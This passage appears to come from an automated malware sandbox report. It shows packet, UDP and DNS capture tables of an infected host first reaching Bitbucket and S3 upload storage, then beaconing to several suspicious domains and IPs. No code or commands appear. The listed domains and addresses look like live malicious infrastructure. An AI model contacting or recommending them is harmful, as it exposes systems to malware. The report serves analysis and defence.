                                                                                                                                        Oct 23, 2024 07:03:05.304594994 CEST5963380192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:05.315924883 CEST5963380192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:05.322485924 CEST805963374.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:06.830909014 CEST5963380192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:06.876924038 CEST805963374.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:07.852015018 CEST5964480192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:07.857589960 CEST805964474.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:07.857687950 CEST5964480192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:07.876691103 CEST5964480192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:07.881973982 CEST805964474.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:09.378021955 CEST5964480192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:09.428827047 CEST805964474.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:10.411715984 CEST5965080192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:10.417228937 CEST805965074.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:10.417318106 CEST5965080192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:10.430186033 CEST5965080192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:10.439354897 CEST805965074.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:10.439373016 CEST805965074.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:11.940325975 CEST5965080192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:12.252897978 CEST5965080192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:12.753643990 CEST805965074.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:12.960628986 CEST5965180192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:12.966105938 CEST805965174.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:12.966200113 CEST5965180192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:12.980887890 CEST5965180192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:12.986197948 CEST805965174.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:13.793690920 CEST805963374.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:13.794539928 CEST5963380192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:16.340368032 CEST805964474.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:16.340559959 CEST5964480192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:18.897955894 CEST805965074.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:18.898138046 CEST5965080192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:21.450452089 CEST805965174.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:21.450730085 CEST5965180192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:21.451342106 CEST5965180192.168.2.774.48.31.123
                                                                                                                                        Oct 23, 2024 07:03:21.456646919 CEST805965174.48.31.123192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:26.491185904 CEST5965280192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:26.496635914 CEST8059652161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:26.496737003 CEST5965280192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:26.508106947 CEST5965280192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:26.513566971 CEST8059652161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:27.366059065 CEST8059652161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:27.366120100 CEST8059652161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:27.366250992 CEST5965280192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:27.498949051 CEST8059652161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:27.499207973 CEST5965280192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:28.019028902 CEST5965280192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:29.037671089 CEST5965380192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:29.044095039 CEST8059653161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:29.044208050 CEST5965380192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:29.054960012 CEST5965380192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:29.061533928 CEST8059653161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:29.881151915 CEST8059653161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:29.881217003 CEST8059653161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:29.881279945 CEST5965380192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:30.006243944 CEST8059653161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:30.006330013 CEST5965380192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:30.565431118 CEST5965380192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:31.583619118 CEST5965480192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:31.589293003 CEST8059654161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:31.589482069 CEST5965480192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:31.605112076 CEST5965480192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:31.611628056 CEST8059654161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:31.612133980 CEST8059654161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:32.440136909 CEST8059654161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:32.440164089 CEST8059654161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:32.440366030 CEST5965480192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:32.573184967 CEST8059654161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:32.573275089 CEST5965480192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:33.134217024 CEST5965480192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:34.151103973 CEST5965580192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:34.156831980 CEST8059655161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:34.156924009 CEST5965580192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:34.163798094 CEST5965580192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:34.169210911 CEST8059655161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:35.010540962 CEST8059655161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:35.010569096 CEST8059655161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:35.010587931 CEST8059655161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:35.010761976 CEST5965580192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:35.133949995 CEST8059655161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:35.134099007 CEST5965580192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:35.137161016 CEST5965580192.168.2.7161.97.168.245
                                                                                                                                        Oct 23, 2024 07:03:35.142540932 CEST8059655161.97.168.245192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:40.726480007 CEST5965680192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:40.733433962 CEST8059656154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:40.733513117 CEST5965680192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:40.743078947 CEST5965680192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:40.750686884 CEST8059656154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:41.684956074 CEST8059656154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:41.737445116 CEST5965680192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:41.867372990 CEST8059656154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:41.867465973 CEST5965680192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:42.252964973 CEST5965680192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:43.272851944 CEST5965780192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:43.278438091 CEST8059657154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:43.278529882 CEST5965780192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:43.288655996 CEST5965780192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:43.294064999 CEST8059657154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:44.790514946 CEST8059657154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:44.799856901 CEST5965780192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:45.818010092 CEST5965880192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:45.823393106 CEST8059658154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:45.823473930 CEST5965880192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:45.835012913 CEST5965880192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:45.840545893 CEST8059658154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:45.840729952 CEST8059658154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:47.346669912 CEST8059658154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:47.347467899 CEST5965880192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:47.347467899 CEST5965880192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:48.366044998 CEST5965980192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:48.371428967 CEST8059659154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:48.374648094 CEST5965980192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:48.380656958 CEST5965980192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:48.393368006 CEST8059659154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:50.333424091 CEST8059659154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:50.377966881 CEST5965980192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:50.515960932 CEST8059659154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:50.518076897 CEST5965980192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:50.522257090 CEST5965980192.168.2.7154.23.184.240
                                                                                                                                        Oct 23, 2024 07:03:50.527626038 CEST8059659154.23.184.240192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:55.795898914 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:55.801373005 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:55.801459074 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:55.909245014 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:55.914613962 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:56.709750891 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:56.709811926 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:56.709844112 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:56.709964037 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:56.709974051 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:56.710086107 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:56.861812115 CEST8059660194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:56.862090111 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:57.424999952 CEST5966080192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:58.443101883 CEST5966180192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:58.448621035 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:58.450650930 CEST5966180192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:58.459850073 CEST5966180192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:58.465255976 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:59.356173992 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:59.356195927 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:59.356205940 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:59.356343031 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:59.356558084 CEST5966180192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:59.507597923 CEST8059661194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:59.507668018 CEST5966180192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:03:59.971817970 CEST5966180192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:00.994266033 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:01.000231981 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.002376080 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:01.014044046 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:01.019471884 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.019664049 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.911946058 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.912000895 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.912018061 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.912055969 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:01.912144899 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:01.912209988 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:02.063843012 CEST8059662194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:02.063910007 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:02.518699884 CEST5966280192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:03.536848068 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:03.542232990 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:03.542314053 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:03.548465967 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:03.553755045 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.447998047 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448009014 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448021889 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448194981 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448203087 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448317051 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448343992 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:04.448343992 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:04.448458910 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448467970 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448476076 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448484898 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.448539972 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:04.448539972 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:04.600486994 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:04.604207039 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:04.606128931 CEST5966380192.168.2.7194.58.112.174
                                                                                                                                        Oct 23, 2024 07:04:04.611398935 CEST8059663194.58.112.174192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:09.777502060 CEST5966480192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:09.783859015 CEST80596643.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:09.783919096 CEST5966480192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:09.794462919 CEST5966480192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:09.799772978 CEST80596643.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:10.476643085 CEST80596643.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:10.480042934 CEST5966480192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:11.300256014 CEST5966480192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:11.446799994 CEST80596643.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:12.319340944 CEST5966580192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:12.324769974 CEST80596653.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:12.324881077 CEST5966580192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:12.339335918 CEST5966580192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:12.344743967 CEST80596653.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:13.016648054 CEST80596653.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:13.017874956 CEST5966580192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:14.534795046 CEST5966580192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:14.541639090 CEST80596653.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:15.552686930 CEST5966680192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:15.558376074 CEST80596663.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:15.558517933 CEST5966680192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:15.567982912 CEST5966680192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:15.573411942 CEST80596663.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:15.573492050 CEST80596663.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:16.229679108 CEST80596663.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:16.229747057 CEST5966680192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:17.081438065 CEST5966680192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:17.086920023 CEST80596663.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:18.099778891 CEST5966780192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:18.105515003 CEST80596673.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:18.105582952 CEST5966780192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:18.113260984 CEST5966780192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:18.118597031 CEST80596673.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:18.771471977 CEST80596673.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:18.810209036 CEST80596673.33.130.190192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:18.810436010 CEST5966780192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:18.811171055 CEST5966780192.168.2.73.33.130.190
                                                                                                                                        Oct 23, 2024 07:04:18.816504002 CEST80596673.33.130.190192.168.2.7

                                                                                                                                        UDP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Oct 23, 2024 07:02:08.574106932 CEST6507253192.168.2.71.1.1.1
                                                                                                                                        Oct 23, 2024 07:02:08.588857889 CEST53650721.1.1.1192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:11.065826893 CEST6366953192.168.2.71.1.1.1
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST53636691.1.1.1192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:16.716217041 CEST5927653192.168.2.71.1.1.1
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST53592761.1.1.1192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:49.106076956 CEST6205353192.168.2.71.1.1.1
                                                                                                                                        Oct 23, 2024 07:02:49.131774902 CEST53620531.1.1.1192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:49.431941032 CEST5354536162.159.36.2192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:50.070867062 CEST5946053192.168.2.71.1.1.1
                                                                                                                                        Oct 23, 2024 07:02:50.079823971 CEST53594601.1.1.1192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:04.896378994 CEST5609353192.168.2.71.1.1.1
                                                                                                                                        Oct 23, 2024 07:03:05.295717001 CEST53560931.1.1.1192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:26.462376118 CEST5374553192.168.2.71.1.1.1
                                                                                                                                        Oct 23, 2024 07:03:26.487673998 CEST53537451.1.1.1192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:40.146703005 CEST6324353192.168.2.71.1.1.1
                                                                                                                                        Oct 23, 2024 07:03:40.723815918 CEST53632431.1.1.1192.168.2.7
                                                                                                                                        Oct 23, 2024 07:03:55.538084984 CEST4938653192.168.2.71.1.1.1
                                                                                                                                        Oct 23, 2024 07:03:55.793108940 CEST53493861.1.1.1192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:09.615719080 CEST5083353192.168.2.71.1.1.1
                                                                                                                                        Oct 23, 2024 07:04:09.775509119 CEST53508331.1.1.1192.168.2.7
                                                                                                                                        Oct 23, 2024 07:04:23.819137096 CEST5740153192.168.2.71.1.1.1
                                                                                                                                        Oct 23, 2024 07:04:24.374213934 CEST53574011.1.1.1192.168.2.7

                                                                                                                                        DNS Queries

                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                        Oct 23, 2024 07:02:08.574106932 CEST192.168.2.71.1.1.10xd63aStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.065826893 CEST192.168.2.71.1.1.10x8bfcStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.716217041 CEST192.168.2.71.1.1.10x240dStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:49.106076956 CEST192.168.2.71.1.1.10xef69Standard query (0)www.joshcharlesfitness.xyzA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:50.070867062 CEST192.168.2.71.1.1.10x60f9Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:04.896378994 CEST192.168.2.71.1.1.10xbfd3Standard query (0)www.facaicloud.topA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:26.462376118 CEST192.168.2.71.1.1.10xebeStandard query (0)www.98080753.xyzA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:40.146703005 CEST192.168.2.71.1.1.10x5c57Standard query (0)www.wcp58.topA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:03:55.538084984 CEST192.168.2.71.1.1.10xe892Standard query (0)www.cpamerix.onlineA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:04:09.615719080 CEST192.168.2.71.1.1.10xc31aStandard query (0)www.lotus9.lifeA (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:04:23.819137096 CEST192.168.2.71.1.1.10x80Standard query (0)www.g4s7e5.bizA (IP address)IN (0x0001)false

                                                                                                                                        DNS Answers

                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                        Oct 23, 2024 07:02:08.588857889 CEST1.1.1.1192.168.2.70xd63aNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:08.588857889 CEST1.1.1.1192.168.2.70xd63aNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:08.588857889 CEST1.1.1.1192.168.2.70xd63aNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com3.5.3.65A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com52.216.32.73A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com3.5.29.111A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com52.216.178.251A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com3.5.27.158A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com52.216.51.193A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com54.231.200.17A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:11.092874050 CEST1.1.1.1192.168.2.70x8bfcNo error (0)s3-w.us-east-1.amazonaws.com52.217.199.249A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com54.231.236.129A (IP address)IN (0x0001)false
                                                                                                                                        Oct 23, 2024 07:02:16.743635893 CEST1.1.1.1192.168.2.70x240dNo error (0)s3-w.us-east-1.amazonaws.com3.5.29.92A (IP address)IN (0x0001)false
